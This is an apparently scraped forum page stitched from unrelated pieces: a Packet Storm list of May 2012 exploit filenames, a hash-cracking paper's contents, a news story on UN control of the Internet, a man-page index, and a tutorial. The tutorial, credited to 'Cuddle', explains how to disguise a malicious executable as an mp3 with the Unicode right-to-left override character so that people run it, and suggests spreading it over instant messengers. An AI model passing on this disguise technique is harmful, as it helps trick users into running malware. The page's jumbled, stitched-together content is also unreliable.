owncloud-ldap-backend.txt -a--- 5/29/2012 2:08 AM 1377 pbboard-lfi.txt -a--- 5/30/2012 2:29 AM 6996 pbboard-mcsrf-fu-cexe.rb.txt -a--- 5/29/2012 6:28 PM 2765 pbboard-sql.txt -a--- 5/21/2012 2:10 PM 949 phalbumpgs-xss.txt -a--- 5/18/2012 5:21 PM 5481 php54-exec.txt -a--- 5/20/2012 10:22 PM 1544 php543-null.txt -a--- 5/21/2012 2:11 PM 1956 php543sink-dos.txt -a--- 5/22/2012 2:11 PM 11877 phpcgi-exploit.txt -a--- 5/6/2012 5:16 AM 1328 phpcgi-inject.txt -a--- 5/23/2012 6:22 PM 1202 phpcollab-bypass.txt -a--- 5/23/2012 5:29 AM 1500 phpcollab-disclose.txt -a--- 5/23/2012 3:12 PM 2045 phpcollab-upload.txt -a--- 5/8/2012 4:13 PM 2520 phpenter-exec.txt -a--- 5/26/2012 6:07 PM 2360 phplist-inject.txt -a--- 5/2/2012 4:19 AM 462 phppastebin-xss.txt -a--- 5/29/2012 2:01 AM 1625 phpvolunteerms-shellxss.txt -a--- 5/29/2012 1:59 AM 1089 phpvolunteerms-sql.txt -a--- 5/6/2012 4:32 AM 3802 php_cgi_arg_injection.rb.txt -a--- 5/31/2012 3:12 AM 7730 php_volunteer_upload_exec.rb.txt -a--- 5/25/2012 11:24 PM 5666 pligg121-lfixss.txt -a--- 5/21/2012 5:22 PM 590 ploggerpg-sql.txt -a--- 5/3/2012 12:33 AM 2457 pluxml-lfi.txt -a--- 5/25/2012 11:19 PM 2919 pragmamx1121-xss.txt -a--- 5/13/2012 10:22 PM 13470 proservrex_1.tgz -a--- 5/2/2012 12:27 AM 1577 pvmgm-sql.txt -a--- 5/11/2012 6:23 PM 49362 qnx-overflows.tgz -a--- 5/27/2012 10:06 PM 4634 quickshare_traversal_write.rb.txt -a--- 5/25/2012 11:56 PM 2264 rabidhamster_r4_log.rb.txt -a--- 5/7/2012 10:56 PM 865 ramuiforum-xss.txt -a--- 5/20/2012 9:22 PM 1396 realdraw-dos.txt -a--- 5/25/2012 11:36 PM 1910 resedit-overflow.tgz -a--- 5/18/2012 6:22 PM 925 resultsunlimitedcms-sql.txt -a--- 5/3/2012 12:22 AM 4656 rt-sa-2012-002.txt -a--- 5/23/2012 5:50 AM 17923 ruubik111-xssdisclosetraversal.txt -a--- 5/15/2012 5:39 AM 669 sabre-xss.txt -a--- 5/2/2012 4:15 AM 4356 samsung-activex.txt -a--- 5/27/2012 9:50 PM 171799 santilga-sqlxsrf.txt -a--- 5/18/2012 5:18 PM 3136 skincrafter-overflow.txt -a--- 5/26/2012 6:06 PM 1038 smallcms-inject.txt -a--- 5/31/2012 3:08 AM 1145 snapdeal-xssredir.txt -a--- 5/24/2012 6:27 PM 4358 socialengine-xssxsrf.txt -a--- 5/12/2012 6:21 PM 1688 sockso-xss.txt -a--- 5/2/2012 4:24 AM 3648 solarwindsstoragemanager-sql.txt -a--- 5/6/2012 4:33 AM 6837 solarwinds_storage_manager_sql.rb.txt -a--- 5/13/2012 4:33 PM 3176 SOS-12-005.txt -a--- 5/2/2012 4:22 AM 325 strato-traversal.txt -a--- 5/31/2012 3:11 AM 4648 styledesign-sql.txt -a--- 5/14/2012 1:22 AM 11629 suitelink_1.tgz -a--- 5/23/2012 5:44 AM 6587 supernews261-sql.txt -a--- 5/16/2012 1:21 AM 2286 svg-trigger.tgz -a--- 5/23/2012 4:33 PM 2171 symantecendpoint-exec.txt -a--- 5/26/2012 6:04 PM 957 symantecwg-lfi.txt -a--- 5/6/2012 5:08 AM 974 symantecwg-xss.txt -a--- 5/29/2012 2:19 AM 2762 symantec_web_gateway_lfi.rb.txt -a--- 5/23/2012 5:27 AM 2344 tftpd32-dos.txt -a--- 5/29/2012 1:54 AM 2422 tftpd32dns-dos.txt -a--- 5/15/2012 2:23 AM 1532 tftp_server_v14ST.rb.txt -a--- 5/29/2012 2:07 AM 2566 topicsviewer-lfisql.txt -a--- 5/6/2012 5:22 AM 728 trombinoscope-sql.txt -a--- 5/16/2012 1:08 AM 3774 tuninfo-sql.txt -a--- 5/14/2012 8:23 PM 1124 universalreader-dos.txt -a--- 5/14/2012 8:23 PM 3758 vallarta-sql.txt -a--- 5/30/2012 2:33 AM 4019 vamcart-shellxsrf.txt -a--- 5/30/2012 2:34 AM 8087 vamcart09_rce.rb.txt -a--- 5/19/2012 4:40 AM 784 vanillaaboutme-xss.txt -a--- 5/19/2012 9:22 PM 708 vanillafln-xss.txt -a--- 5/19/2012 4:41 AM 610 vanillalc-xss.txt -a--- 5/2/2012 4:40 AM 1392 vbulletin4112-xss.txt -a--- 5/2/2012 4:14 AM 695 veissweb-sql.txt -a--- 5/19/2012 3:12 PM 2957 vertrigoserv-escalate.txt -a--- 5/2/2012 4:42 AM 3641 VL-321.txt -a--- 5/2/2012 4:35 AM 12925 VL-511.txt -a--- 5/13/2012 9:00 AM 5015 VL-512.txt -a--- 5/13/2012 1:22 AM 7127 VL-513.txt -a--- 5/6/2012 4:42 AM 5706 VL-516.txt -a--- 5/4/2012 5:56 PM 7405 VL-517.txt -a--- 5/12/2012 5:22 PM 5834 VL-519.txt -a--- 5/12/2012 3:12 PM 6491 VL-521.txt -a--- 5/4/2012 5:58 PM 9450 VL-524.txt -a--- 5/13/2012 8:56 AM 9404 VL-525.txt -a--- 5/13/2012 9:02 AM 7680 VL-530.txt -a--- 5/12/2012 4:13 PM 5603 VL-535.txt -a--- 5/4/2012 6:00 PM 10643 VL-536.txt -a--- 5/2/2012 4:48 AM 13642 VL-537.txt -a--- 5/2/2012 4:20 AM 4290 VL-538.txt -a--- 5/13/2012 9:04 AM 4361 VL-560.txt -a--- 5/4/2012 1:45 AM 5982 vlc_mms_bof.rb.txt -a--- 5/6/2012 4:39 AM 8324 vmware-backdoor.txt -a--- 5/4/2012 1:43 AM 3285 waraxe-2012-SA087.txt -a--- 5/4/2012 2:11 AM 3109 waraxe-2012-SA088.txt -a--- 5/25/2012 11:56 PM 3953 webid_converter.rb.txt -a--- 5/6/2012 5:23 AM 3047 webrelations-sql.txt -a--- 5/28/2012 9:22 PM 2119 whmcs-sql.tgz -a--- 5/31/2012 2:47 AM 2541 whmcs-xssxsrf.txt -a--- 5/27/2012 9:51 PM 4011 whyweb-sql.txt -a--- 5/12/2012 12:58 AM 6565 wikka_spam_exec.rb.txt -a--- 5/3/2012 12:06 AM 1829 win32k-dos.txt -a--- 5/2/2012 4:46 AM 748 windsonline-sql.txt -a--- 5/29/2012 1:55 AM 1516 winradius-dos.txt -a--- 5/23/2012 5:45 AM 15808 winxpkeyboard.zip -a--- 5/24/2012 6:15 PM 1816 wiresharkdiameter-dos.tgz -a--- 5/24/2012 6:12 PM 3289 wiresharkdis-dos.tgz -a--- 5/24/2012 5:53 PM 536 wiresharkmisalign-dos.tgz -a--- 5/31/2012 2:51 AM 3750 wmsvaio-overflow.txt -a--- 5/6/2012 4:46 AM 1010 wordpress322-xss.txt -a--- 5/11/2012 5:26 AM 6023 wp2click-xss.txt -a--- 5/15/2012 6:09 AM 881 wp2clicksocialmedia-xss.txt -a--- 5/11/2012 5:34 AM 25581 wpbadbehavior-xss.txt -a--- 5/11/2012 5:31 AM 6587 wpbetterwp-xss.txt -a--- 5/11/2012 5:32 AM 7078 wpbulletproof-xss.txt -a--- 5/15/2012 6:08 AM 1024 wpcatablog-xss.txt -a--- 5/15/2012 6:05 AM 686 wpcodestyling-xss.txt -a--- 5/11/2012 5:29 AM 12032 wpcustomcontacts-xss.txt -a--- 5/15/2012 6:02 AM 786 wpdownloadmanager-xss.txt -a--- 5/15/2012 6:00 AM 960 wpdownloadmonitor-xss.txt -a--- 5/15/2012 5:59 AM 668 wpdynamicwidgets-xss.txt -a--- 5/15/2012 5:09 AM 685 wpeasygallery-xss.txt -a--- 5/15/2012 5:58 AM 684 wpezpzoneclickbackup-xss.txt -a--- 5/13/2012 6:22 PM 1113 wpfacethumb-xss.txt -a--- 5/15/2012 5:54 AM 1340 wpforumserver-sqlxss.txt -a--- 5/15/2012 5:53 AM 814 wpgdstarrating-xss.txt -a--- 5/15/2012 5:57 AM 771 wpgrandflashalbumgallery-xss.txt -a--- 5/15/2012 5:52 AM 718 wpiframeadminpages-xss.txt -a--- 5/15/2012 5:49 AM 763 wpleaflet-xss.txt -a--- 5/15/2012 5:46 AM 841 wpleaguemanager-xss.txt -a--- 5/15/2012 5:45 AM 818 wpmediacategories-xss.txt -a--- 5/15/2012 5:44 AM 1089 wpmingleforum-xss.txt -a--- 5/15/2012 5:43 AM 689 wpnetworkpublisher-xss.txt -a--- 5/15/2012 5:42 AM 1552 wpnewslettermanager-xss.txt -a--- 5/15/2012 5:51 AM 838 wppdfprintbutton-xss.txt -a--- 5/15/2012 5:40 AM 1333 wpprettylinklite-sqlxss.txt -a--- 5/15/2012 5:19 AM 761 wpshareandfollow-xss.txt -a--- 5/15/2012 5:18 AM 821 wpsharebar-sqlxss.txt -a--- 5/15/2012 5:17 AM 913 wpsoundcloud-xss.txt -a--- 5/15/2012 5:06 AM 804 wpstatistics-xss.txt -a--- 5/15/2012 5:16 AM 1028 wpsubscribe2-xss.txt -a--- 5/15/2012 5:03 AM 1347 wpsurveyquiztool-xss.txt -a--- 5/15/2012 9:00 PM 711 wptrackthatstat-xss.txt -a--- 5/15/2012 5:00 AM 1542 wpzingiriwebshop235-xss.txt -a--- 5/9/2012 8:22 PM 1030 x7chat-xsrf.txt -a--- 5/29/2012 1:57 AM 4182 yamamah-disclose.txt -a--- 5/22/2012 6:38 AM 851 yandex-xss.txt -a--- 5/23/2012 6:22 PM 869 ydframework-disclose.txt -a--- 5/3/2012 12:41 AM 7231 ZSL-2012-5086.txt -a--- 5/9/2012 5:08 AM 1081 ZSL-2012-5087.txt -a--- 5/17/2012 2:42 AM 1393 ZSL-2012-5088.txt -a--- 5/17/2012 3:10 AM 1063 ZSL-2012-5089.txt -a--- 5/17/2012 3:17 AM 3110 ZSL-2012-5090.txt -a--- 5/17/2012 3:19 AM 2751 ZSL-2012-5091.txt Download Packet Storm New Exploits For May, 2012 ? Packet Storm

Vre?i s? munci?i dar nu ave?i unde? Poftim: https://rstcenter.com/forum/53480-youve-got-money.rst

Sudeep Singh 5/21/2012 Table of Contents Preface Advanced Hash Cracking ...3 Cryptographic Hash Properties ...4 Hash to the Stash ...5 Oclhashcat – An insight ...6 The need for Stronger Hashes ...13 Fast vs Slow Hashes ...19 How much Salt? ...20 How Many Iterations? ...21 John The Ripper (JTR) – Tweak That Attack! ...25 JTR POT Analyzer ...27 Word Mangling Rules ...33 GPU Vs CPU ...37 Conclusion. ...41 References ...43 http://dl.packetstormsecurity.net/papers/general/advanced-crack.pdf

The United Nations will meet in Dubai this December to make a decision that could carry significant consequences for the future of all web users: Should the UN be granted more control over the Internet? With the high-profile meeting looming at the end of this year’s calendar, key members of the U.S. government and private sector firms will meet with lawmakers Thursday to argue that the U.S. should work to defeat the proposal, which they consider a dangerous breach of existing norms. Currently, the Internet is regulated in what’s called a “multi-stakeholder” model, with various private and public organizations each playing specific roles in keeping the its wheels spinning. Change that setup, argues the panel, and you put at risk the entire structure of the Internet. “A top-down, centralized, international regulatory overlay is antithetical to the architecture of the Net, which is a global network of networks without borders,” wrote FCC Commissioner and panel member Robert McDowell in the Wall Street Journal. “No government, let alone an intergovernmental body, can make engineering and economic decisions in lightning-fast Internet time.” Countries in favor of the plan, such as Russia and China, have argued that the organizations currently charged with oversight of the Internet, such as the Internet Corporation for Assigned Names and Numbers, or ICANN, are too closely tied to the United States. Moving Internet regulatory authority to the UN, they argue, would democratize control over it. However, some Internet privacy experts are concerned that giving censorship-heavy nations such as China more say in Internet regulation would have disastrous consequences for online free speech. “Maybe it bothers you that the U.S. controls these major keys to the Internet, but I think it’s a good thing,” wrote Larry Seltzer for Byte. “Without control of these critical facilities, no international group of dictators can really exert much control outside of their own boundaries.” Included in the panel will be Ambassador Philip Verveer, Deputy Assistant Secretary of State and U.S. Coordinator for International Communications and Information Policy; FCC Commissioner Robert McDowell; Ambassador David A. Gross, Former U.S. Coordinator for International Communications and Information Policy; Sally Shipman Wentworth, Senior Manager of Public Policy at the Internet Society and Vinton Cerf, Vice President and Chief Internet Evangelist at Google. The House subcommittee panel will be broadcast via the web at 10:15 a.m. ET on Thursday, May 31. Source

Overview Part I User Commands 2 Part II System Calls 738 Part III Library Functions 892 Part IV Special Files 1064 Part V File Formats 1104 Part VI Games 1210 Part VII Miscellaneous 1214 Part VIII Administration and Privileged Commands 1258 Part IX Kernel Reference Guide 1424 Download

https://rstcenter.com/forum/28420-interviu-bine-ati-venit.rst

This is a usefull tut I found, all credits go to Cuddle: This tutorial will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! By normally changing the extension to e.g .mp3, will corrupt your file, but with this exploit your file will still be executable! 1. I have my server.exe, but I want it to look like a mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end. Now, rename your server.scr (which is still executable) to "songname uploaded by .SCR" (notice the space). 2. Now it's time to use the exploit! Open up the Character Map: Scroll down and find the "U+202E: Right-To-Left Override" character: Click "Select" and then "Copy". 3. Now choose to rename your file, and paste the copied character right before the ".SCR" (press ctrl+v to paste) Then type "3pm" (without the " ") and press Enter. Now it should look like this: Done! Obviously you might want to change the icon to look like an mp3 before doing this.. A short video can be found here: - [MediaFire] - [MultiUpload] - [ ] (Watch in HD + Fullscreen) Most browsers have patched this, but it can be used on IM's like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside. Now go ahead and mix around with .exe/.scr/.com and the fake-extensions to find some other legit-looking combinations! If you have any questions, feel free to ask! : blackhat: Also, here's a .pdf explaining the exploit: http://dl.packetstormsecurity.net/papers/general/righttoleften-override.pdf Those who can't find the character in the default CharMap in windows, do this: (not sure if it works but worth a try) 1. Download BabelMap and run it. 2. Open this picture: - Make sure "Single Font" is ticked and "Arial Unicode MS" is chosen as Font. - Search for OVERRIDE and click on the RTLO character (row 2020, column E) - Click on the Select-button - Click on the Copy button Also, those who have problems with WinXP and non-english OS versions, take a look at this. article from r00tw0rm